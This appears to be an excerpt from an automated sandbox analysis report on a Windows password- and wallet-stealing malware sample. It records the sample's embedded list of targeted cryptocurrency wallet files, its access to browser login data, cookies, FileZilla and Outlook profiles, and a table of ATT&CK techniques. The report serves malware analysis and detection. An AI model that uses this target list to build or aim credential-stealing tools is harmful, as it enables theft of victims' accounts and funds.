Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001B0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 81.77\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\*.*
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-walJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shmJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004Jump to behavior
                        Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe PID: 7352, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: 11.2.a37ec701f3.exe.120000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe.de0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1850057063.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.1969439309.0000000000121000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.1970868241.0000000001414000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1852046462.0000000001ABE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe PID: 7352, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: a37ec701f3.exe PID: 7344, type: MEMORYSTR
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 11.2.a37ec701f3.exe.120000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe.de0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1850057063.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.1969439309.0000000000121000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe PID: 7352, type: MEMORYSTR
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                        Native API
                        1
                        DLL Side-Loading
                        1
                        DLL Side-Loading
                        1
                        Deobfuscate/Decode Files or Information
                        2
                        OS Credential Dumping
                        1
                        System Time Discovery
                        Remote Services1
                        Archive Collected Data
                        12
                        Ingress Tool Transfer
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts2
                        Command and Scripting Interpreter
                        1
                        Scheduled Task/Job
                        12
                        Process Injection
                        3
                        Obfuscated Files or Information
                        LSASS Memory1
                        Account Discovery
                        Remote Desktop Protocol4
                        Data from Local System
                        2
                        Encrypted Channel
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts1
                        Scheduled Task/Job
                        Logon Script (Windows)1
                        Scheduled Task/Job
                        12
                        Software Packing
                        Security Account Manager2
                        File and Directory Discovery
                        SMB/Windows Admin Shares1
                        Email Collection
                        2
                        Non-Application Layer Protocol
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                        DLL Side-Loading
                        NTDS236
                        System Information Discovery
                        Distributed Component Object ModelInput Capture112
                        Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                        Masquerading
                        LSA Secrets761
                        Security Software Discovery
